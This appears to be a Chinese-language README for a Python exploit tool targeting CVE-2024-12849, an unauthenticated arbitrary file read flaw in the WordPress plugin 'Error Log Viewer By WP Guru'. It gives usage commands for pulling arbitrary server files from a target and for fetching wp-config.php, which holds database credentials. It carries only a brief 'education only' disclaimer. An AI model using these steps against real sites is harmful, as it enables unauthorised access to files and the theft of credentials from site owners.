Error Log Viewer By WP Guru 这个 WordPress 插件在 1.0.1.3 及之前的所有版本中,通过 wp_ajax_nopriv_elvwp_log_download AJAX 操作存在任意文件读取漏洞。这使未认证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。
pip install requests
示例命令
python CVE-2024-12849.py -u http://192.168.100.74/wordpress
要从服务器下载特定文件,请使用 --file(或 -f)选项指定文件路径。 该脚本会发送请求获取文件并保存响应。
示例命令:
python CVE-2024-12849.py -u http://192.168.100.74/wordpress -f /path/file
要下载敏感的 wp-config.php 文件,请使用 --path(或 -p)选项指定 WordPress 安装目录。 该脚本会在给定路径后附加 /wp-config.php 并尝试获取该文件。
示例命令:
python CVE-2024-12849.py -u http://192.168.100.74/wordpress -p /opt/lampp/htdocs/wordpress
所有结果(包括成功和错误)都会记录到名为 data.txt 的文件中。 该文件包含每次操作的时间戳,方便回顾过往操作。
此脚本仅用于教育目的。作者不对因滥用此脚本而造成的任何损害负责。